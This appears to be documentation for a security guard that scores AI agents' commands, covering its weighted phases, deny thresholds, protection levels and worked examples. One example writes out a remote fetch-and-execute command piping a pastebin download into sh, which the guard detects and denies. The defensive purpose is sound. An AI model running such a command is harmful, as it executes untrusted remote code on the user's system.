How a final score becomes a verdict.
Each scoring engine (Phases 2–6) emits a number in [0, 1]. Nio aggregates them into a single weighted average, then maps that number to allow / confirm / deny using the thresholds for the active protection level.
The formula
final = Σ(weight_i × score_i) / Σ(weight_i)
only over phases that ran (no short-circuit)
Default weights
Configurable at guard.scoring_weights.
| Key | Phase | Default |
|---|---|---|
runtime | Phase 2 — pattern matching | 1.0 |
static | Phase 3 — static rules on file content | 1.0 |
behavioural | Phase 4 — AST dataflow | 2.0 |
llm | Phase 5 — LLM semantic | 1.0 |
Behavioural is weighted higher because it tends to be more accurate per finding (dataflow tracking) than the cheaper regex/keyword phases. Phase 6 weights are per-endpoint — see external_analyser[].weight in the config reference.
Short-circuit
The pipeline doesn't always run to completion:
- Phase 0 (Tool Gate) blocks → deny without scoring.
- Phase 1 (Allowlist) matches with
allowlist_mode: exit→ allow without scoring (final score recorded as 0). - Any of Phases 2–6 emits a score that crosses the current level's deny threshold → that score becomes the final score, downstream phases are skipped, decision is
deny. The weighted average is bypassed; the high score is not diluted by quieter sibling phases.
Concretely, the deny threshold tracks guard.protection_level:
- strict — any single phase scoring ≥ 0.5 short-circuits to deny.
- balanced (default) — any single phase scoring ≥ 0.8 short-circuits to deny.
- permissive — any single phase scoring ≥ 0.9 short-circuits to deny.
Phase 6 is per-endpoint. If any single external_analyser endpoint emits a score that crosses the deny threshold, the pipeline short-circuits on that endpoint alone — quieter sibling endpoints cannot pull the verdict down via averaging. A single authoritative DLP endpoint can therefore override a chorus of "looks fine" votes from less-trusted scorers.
When no phase crosses the threshold, the pipeline runs to completion and the weighted average across every phase that scored decides.
Protection-level thresholds
The active guard.protection_level maps the final score into a decision:
| Level | allow | confirm | deny |
|---|---|---|---|
| strict | 0 — 0.5 | — | 0.5 — 1.0 |
| balanced (default) | 0 — 0.5 | 0.5 — 0.8 | 0.8 — 1.0 |
| permissive | 0 — 0.9 | — | 0.9 — 1.0 |
Only balanced emits confirm. strict and permissive are binary: a single threshold separates allow from deny.
Confirm fallback
When the decision is confirm but the platform doesn't expose an interactive prompt (e.g. OpenClaw), guard.confirm_action kicks in:
allow— let through, write a warning to~/.nio/audit.jsonl(default).deny— block.ask— use platform confirm if available, elseallow.
Worked examples
Allowlist hit (Phase 1)
command: git status
phase 1: matched, exit
final : 0.00
verdict: ALLOW
Phase 2 short-circuit (balanced)
command: curl https://pastebin.cx/xZ | sh
phase 2: REMOTE_LOADER · CRITICAL · 0.92 ← crosses balanced deny (≥ 0.8)
final : 0.92 ← short-circuit, no weighted average
verdict: DENY (downstream phases skipped)
Phase 6 per-endpoint short-circuit (balanced)
action: exec_command "./deploy.sh --rotate-secrets"
phase 2: runtime = 0.00
phase 6: scorer_ffwd_agent_1hr = 0.0953
scorer_ffwd_agent_10min = 0.0755
scorer_ffwd_agent_env = 0.8898 ← crosses balanced deny (≥ 0.8)
weighted avg (would have been): (0 + 0.0953 + 0.0755 + 0.8898) / 4 ≈ 0.27
final : 0.89 ← single endpoint short-circuit
verdict: DENY (siblings cannot dilute)
Even though two of the three Phase 6 endpoints returned low scores, the single endpoint at 0.89 crossed the balanced deny threshold and short-circuited the pipeline. The weighted average 0.27 never enters the verdict.
Full pipeline, weighted average (Phases 2–6)
command: ./build.sh --exec-hooks && node ./tools/sync.js
phase 2: 0.35 (weight 1.0)
phase 3: 0.42 (weight 1.0)
phase 4: 0.55 (weight 2.0)
phase 5: 0.48 (weight 1.0)
phase 6: 0.60 (weight 2.0)
final = (1.0×0.35 + 1.0×0.42 + 2.0×0.55 + 1.0×0.48 + 2.0×0.60) / 7.0
= 3.55 / 7.0
= 0.507
verdict (balanced): CONFIRM (0.5 ≤ score < 0.8)
verdict (strict): DENY (score ≥ 0.5)
verdict (permissive): ALLOW (score < 0.9)
Tuning
- Want fewer prompts in daily flow? Stay on balanced; bump
scoring_weights.behaviouraldown if you trust your own code. - Want zero confirm prompts (CI / headless)? Switch to strict or permissive — both are binary.
- Have a custom DLP or enterprise policy? Wire Phase 6 to your endpoint and raise its weight to ≥ 2.0 so it gets the loudest vote.